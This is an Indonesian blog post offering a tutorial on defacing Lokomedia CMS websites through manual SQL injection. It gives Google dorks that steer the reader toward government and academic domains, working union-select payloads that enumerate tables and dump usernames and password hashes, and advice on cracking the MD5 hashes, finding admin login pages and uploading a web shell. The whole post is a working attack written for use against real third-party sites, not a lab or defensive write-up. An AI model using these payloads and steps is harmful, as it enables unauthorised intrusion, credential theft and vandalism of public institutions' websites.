Deface SQLi Manual Pada CMS Lokomedia



Langsung ke tutorial nya aja yah boskuhh.. Males bicara banyak soal nya :v

Bahan Bahan :
1. Dork Google
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
Inurl:berita-23 ext:html

Inurl:hal-tentang-kami.htmlInurl:info-20 ext:html
 *Nb : Tambahin site: go.id gan biar greget :v ato site:ac.id site:id

2. Exploit SQLi 
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Sekarang Lanjut tutorial nya gan


1. Kalo udah nemuin web nya gimana gan? sekarang tambahin exploit nya seperti ini (')

contoh.. https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018'.html

Terus ciri - ciri vuln gimana gan? gini gan,
ciri2 vuln itu, biasanya halaman hilang sebagian.. entah itu artikel atau image nya..

3. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip, cara nya gimana gan? dengan cara melihat awal terjadinya error kembali,

Contoh :
https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018
’+order+by+2–+–.html (normal)

https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018’+order+by+6–+–.html (Error)

https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018’+order+by+5–+–.html (normal)

Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya, Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “order by“ dengan “union select“ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – atau . di depan angka, contoh:

https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018'+union+select+1,2,3,4,5–+–.html

Nanti akan keluar angka ajaib, contoh angka ajaib saya 2&4

4. Pemasangan exploit manual, dengan cara tambahkan exploit sqli manual di angka ajaib tersebut, contoh:

https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018’+uniom+select+1,concat(0x496e6a6563742062792062616475742067616c6175,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5–+–.html

Nanti akan keluar, table dan data, dari situs tersebut.

5. Tinggal mencari atau dump user password, dengan cara ganti exploif di atas dengan exploit dump berikut..
contoh:

https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018’+union+select+1,(select(@x)from(select(@x:=0x00),(select(@x)from(Users)where(@x)in(@x:=concat(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),3,4,5–+–.html

(Users) di isi dengan table sebelah kiri, dan untuk (username)dan (password) di isi dengan table sebelah kanan.

dah gan gampang kan :v
-----------------------------------------------------------------------------------------------------------------------------
Masih kurang tutorial nya? oke simak lagi gan...

Dork nya masih sama...
tambahan.. menggunakan MD5 untuk menerjemahkan password berupa angka

Kita cari lagi Target web nya.. sudah ketemu? kita inject seperti ini gan..
contoh :

https://www.rabiitch.ga/deface-sqli-manual-pada-cms-lokomedia-2018'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+.html

Jika vuln web nya gimana gan? jika vuln akan terdapat MD5 Gan.. atau berupa angka panjang.. contohnya? cek


Kalian terjemahkan dulu ke MD5 ...
Kalo udah kita cari web admin login nya gan.. dimana gan web admin berada?
web admin biasanya terdapat di
/admin/
/adminweb/
/administrator/
/login/

Udah masuk web admin? masuk lah sekrang up shell :v

Note : saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya gan ada ga.. hehe..

Oke sekian tutorial yg RaBiitch Berikan mengenai Cara Deface SQLi Manual Pada CMS Lokomedia

Tag :
1. Deface SQL Lokomedia
2. Cara Deface Dengan SQL Injection Manually
3. dork sql lokomedia
4. Cara deface lokomedia

1 Response to "Deface SQLi Manual Pada CMS Lokomedia"

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel